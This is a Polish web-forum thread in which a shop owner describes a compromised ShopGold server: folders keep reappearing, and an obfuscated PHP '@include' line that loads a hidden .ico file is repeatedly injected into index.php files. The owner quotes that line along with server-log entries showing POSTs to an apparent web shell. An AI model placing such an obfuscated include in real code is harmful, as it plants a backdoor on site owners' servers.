![]() |
![]() |
![]() ![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 11 Pomógł: 0 Dołączył: 15.12.2007 Ostrzeżenie: (0%) ![]() ![]() |
Witam serdecznie,
Ostatnio mam problem na serwerze nazwa. Mamy postawiony sklep i pierwsze co się dzieje: 1. Tworzą się jakieś dziwne foldery na ftp typu: xjrsap, charmed-das, 2. Dopisywana jest komenda do plików index.php na serwerze nad znacznikiem header np. ""@include"\057hom\145/se\162ver\066872\0654/f\164p/m\151gra\143ja/\153mbc\056hom\145.pl\057pub\154ic_\150tml\057son\141rsk\154ep.\160l/t\143pdf\057inc\154ude\057bar\143ode\163/.2\062c2e\0612b.\151co"" 3. Zmieniałem hasło do FTP ale nic to nie daje, podejrzewam że jest jakiś wirus który dopisuje skrypt, nie znam się na tyle na php. Do tej pory edytowałem wszystkie pliki index.php i usunąłem dziwny kod, dzisiaj od nowa jest dopisany. Łącze się tylko z jednego komputera z FTP, kaspersky skanuje mi codziennie kompa. Pomoc z hostingu rozkłada ręce. Po prostu mi ręce opadają. Jakieś podpowiedzi? |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 11 Pomógł: 0 Dołączył: 15.12.2007 Ostrzeżenie: (0%) ![]() ![]() |
Sklep jest na oprogramowaniu shopgold, nie ma nikt hasła zapisanego bo go zmieniłem 2 razy już i tylko ja się loguje bez zapisywania hasła. Nie wiem co można zrobić w tym temacie. Nie mogę namierzyć tego pliku :/
Przeglądam logi serwera i jest np. 183.91.78.211 - - [24/Apr/2021:05:51:47 +0200] "POST /zx32ub/index.php HTTP/1.0" 200 133 "http://cake.nazwasklepu.pl/zx32ub/index.php" "Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36" ams1 207.46.13.109 - - [24/Apr/2021:05:51:47 +0200] "GET /irish-state-vvuux/eee2fe-man-utd-vs-newcastle-results-history HTTP/2.0" 404 10028 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" sea1 Np. mam taki folder z tą nazwą: irish-state-vvuux oraz zx32ub. Ten post edytował Dustin77 24.04.2021, 16:22:28 |
|
|
![]() ![]() |
![]() |
Aktualny czas: 13.10.2025 - 11:33 |